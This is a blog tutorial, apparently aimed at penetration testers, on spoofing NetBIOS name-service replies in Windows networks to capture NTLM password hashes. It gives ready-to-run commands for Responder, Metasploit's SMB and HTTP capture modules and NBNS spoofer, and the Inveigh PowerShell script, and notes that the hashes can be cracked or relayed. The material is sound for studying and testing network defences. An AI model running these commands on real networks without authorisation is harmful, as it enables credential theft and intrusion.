Netbios Name Service (NBT-NS) is used in Windows networks for communication between hosts. Systems will use this service when resolving names over LHOSTS and DNS fail. Abusing this service to perform a Man-in-the-middle attack is a common tactic that has been widely used by penetration testers and red teamers to gain initial foothold inside a system. The retrieved password hashes can be cracked offline or can be used in conjunction with a relay attack to achieve legitimate access into hosts.

Responder

Trustwave SpiderLabs developed Responder to implement the NBNS spoofing attack. Running the tool with the following arguments will initiate the poisoning against various protocols that require authentication such as SMB, HTTP etc.

responder -I eth0 -e 10.0.0.2 -b -A -v
NBNS Spoofing - Responder
NBNS Spoofing – Responder

When a host in the network sent a NetBIOS broadcast the machine of the attacker will sent a fake reply and the host will attempt to authenticate to a resource using the NTLM password hash.

NBNS Spoofing - Hashes via Responder
NBNS Spoofing – Hashes via Responder

Metasploit

NBNS Spoofing can be implemented through Metasploit Framework by using a variety of modules that can capture the negotiate authentication challenge for protocols such as SMB  and HTTP. For capturing the password hash over SMB the following module needs to be used:

use auxiliary/server/capture/smb
set SRVHOST 10.0.0.2
set cainpwfile /tmp/cain-smb
set johnpwfile /tmp/john-smb
set logfile /tmp/logfile
run
Metasploit - SMB Server
Metasploit – SMB Server

The module for capturing the NTLM authentication challenge over HTTP can be configured as below:

use auxiliary/server/capture/http_ntlm
set SRVHOST 10.0.0.2
set SRVPORT 80
set URIPATH /
set cainpwfile /tmp/cain-http
set johnpwfile /tmp/john-http
set logfile /tmp/logfile
run
Metasploit - HTTP Server
Metasploit – HTTP Server

The following module will sent the NetBIOS name service responses to the hosts that will sent NetBIOS broadcast requests over the network.

use auxiliary/spoof/nbns/nbns_response
set SPOOFIP 10.0.0.2
run 
Metasploit - NBNS Response Module
Metasploit – NBNS Response Module

When a network user will attempt to use the NetBIOS broadcast request to identify a resource the traffic will redirected to the attacker host and the password hash will be captured.

NBNS Spoofing - Hashes via Metasploit
NBNS Spoofing – Hashes via Metasploit

PowerShell

Kevin Robertson implemented this attack in a PowerShell script called Inveigh. This script is part of Empire, PoshC2 and other tools and can be configured as follows:

Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
NBNS Spoofing - PowerShell Inveigh
NBNS Spoofing – PowerShell Inveigh

The password hash of the user will be captured like Responder and Metasploit.

NBNS Spoofing - Hashes via Inveigh
NBNS Spoofing – Hashes via Inveigh

References

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s